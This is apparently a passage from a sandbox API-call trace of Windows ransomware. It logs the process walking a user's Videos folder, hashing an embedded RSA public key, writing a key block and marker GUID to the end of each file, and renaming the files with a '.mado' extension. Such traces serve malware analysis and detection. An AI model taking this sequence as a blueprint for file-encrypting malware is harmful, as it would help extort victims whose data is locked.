[0205.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75a70 [0205.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.669] GetCurrentThreadId () returned 0x600 [0205.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0205.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75b78 [0205.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75c80 [0205.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea18 [0205.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe9d0 [0205.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe9e8 [0205.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0205.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe9b8 [0205.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea30 [0205.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0205.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0205.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea00 [0205.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea48 [0205.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0205.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0205.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0205.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe9d0 | out: hHeap=0x2c0000) returned 1 [0205.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe9d0 [0205.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0205.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea18 | out: hHeap=0x2c0000) returned 1 [0205.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eb80 [0205.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea48 | out: hHeap=0x2c0000) returned 1 [0205.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0205.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0205.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6edb0 [0205.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0205.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eec8 [0205.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe9d0 | out: hHeap=0x2c0000) returned 1 [0205.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74e80 [0205.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75d88 [0205.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.672] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x77f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.672] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.672] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.672] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.672] CloseHandle (hObject=0x63c) returned 1 [0205.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x3b74e80 [0205.673] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ee2U4KlmK-3zpwEnEyLp\\eh3k5OVCfE.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ee2u4klmk-3zpweneylp\\eh3k5ovcfe.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ee2U4KlmK-3zpwEnEyLp\\eh3k5OVCfE.avi.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ee2u4klmk-3zpweneylp\\eh3k5ovcfe.avi.mado")) returned 1 [0205.675] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x342fcd60, ftCreationTime.dwHighDateTime=0x1d5e093, ftLastAccessTime.dwLowDateTime=0x4f529b60, ftLastAccessTime.dwHighDateTime=0x1d5e1bd, ftLastWriteTime.dwLowDateTime=0x4f529b60, ftLastWriteTime.dwHighDateTime=0x1d5e1bd, nFileSizeHigh=0x0, nFileSizeLow=0xa249, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="k0yrveDk4zl.swf", cAlternateFileName="K0YRVE~1.SWF")) returned 1 [0205.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x32d6360 [0205.675] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ee2U4KlmK-3zpwEnEyLp\\k0yrveDk4zl.swf") returned=".swf" [0205.675] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ee2U4KlmK-3zpwEnEyLp\\k0yrveDk4zl.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ee2u4klmk-3zpweneylp\\k0yrvedk4zl.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.676] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=41545) returned 1 [0205.676] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.678] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xa223, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.678] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.679] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xa249, lpOverlapped=0x0) returned 1 [0205.680] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.680] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.680] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.680] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0205.681] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.681] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.681] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.681] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.681] GetLastError () returned 0x0 [0205.681] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.681] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0205.681] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.682] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.682] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.682] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b72b80, Size=0x218) returned 0x3b7c6a8 [0205.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.682] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xa249, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.682] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.682] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.682] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.683] CloseHandle (hObject=0x63c) returned 1 [0205.684] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ee2U4KlmK-3zpwEnEyLp\\k0yrveDk4zl.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ee2u4klmk-3zpweneylp\\k0yrvedk4zl.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ee2U4KlmK-3zpwEnEyLp\\k0yrveDk4zl.swf.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ee2u4klmk-3zpweneylp\\k0yrvedk4zl.swf.mado")) returned 1 [0205.685] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39a88220, ftCreationTime.dwHighDateTime=0x1d5d9cf, ftLastAccessTime.dwLowDateTime=0x71d2a010, ftLastAccessTime.dwHighDateTime=0x1d5df59, ftLastWriteTime.dwLowDateTime=0x71d2a010, ftLastWriteTime.dwHighDateTime=0x1d5df59, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Rg76NG", cAlternateFileName="")) returned 1 [0205.685] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39a88220, ftCreationTime.dwHighDateTime=0x1d5d9cf, ftLastAccessTime.dwLowDateTime=0x71d2a010, ftLastAccessTime.dwHighDateTime=0x1d5df59, ftLastWriteTime.dwLowDateTime=0x71d2a010, ftLastWriteTime.dwHighDateTime=0x1d5df59, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Rg76NG", cAlternateFileName="")) returned 0 [0205.685] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0205.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0205.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.686] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0205.686] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0205.686] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iMNzi0f_lMj\\") returned="iMNzi0f_lMj\\" [0205.686] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0205.686] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0205.686] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0205.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.686] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0205.686] PathFindFileNameW (pszPath="") returned="" [0205.686] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iMNzi0f_lMj\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30afe540, ftCreationTime.dwHighDateTime=0x1d5e38f, ftLastAccessTime.dwLowDateTime=0x64cca8f0, ftLastAccessTime.dwHighDateTime=0x1d5dfb0, ftLastWriteTime.dwLowDateTime=0x64cca8f0, ftLastWriteTime.dwHighDateTime=0x1d5dfb0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0205.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.687] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30afe540, ftCreationTime.dwHighDateTime=0x1d5e38f, ftLastAccessTime.dwLowDateTime=0x64cca8f0, ftLastAccessTime.dwHighDateTime=0x1d5dfb0, ftLastWriteTime.dwLowDateTime=0x64cca8f0, ftLastWriteTime.dwHighDateTime=0x1d5dfb0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0205.687] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf01b890, ftCreationTime.dwHighDateTime=0x1d5dcdc, ftLastAccessTime.dwLowDateTime=0xf6436680, ftLastAccessTime.dwHighDateTime=0x1d5e559, ftLastWriteTime.dwLowDateTime=0xf6436680, ftLastWriteTime.dwHighDateTime=0x1d5e559, nFileSizeHigh=0x0, nFileSizeLow=0x8ad6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hBFHaXpuqXh9A6Tjfu.mkv", cAlternateFileName="HBFHAX~1.MKV")) returned 1 [0205.687] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iMNzi0f_lMj\\hBFHaXpuqXh9A6Tjfu.mkv") returned=".mkv" [0205.687] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iMNzi0f_lMj\\hBFHaXpuqXh9A6Tjfu.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\imnzi0f_lmj\\hbfhaxpuqxh9a6tjfu.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.688] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=35542) returned 1 [0205.688] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.690] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x8ab0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.690] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.691] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x8ad6, lpOverlapped=0x0) returned 1 [0205.692] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.692] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.692] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.692] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321af0) returned 1 [0205.693] CryptCreateHash (in: hProv=0x321af0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.693] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.693] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, 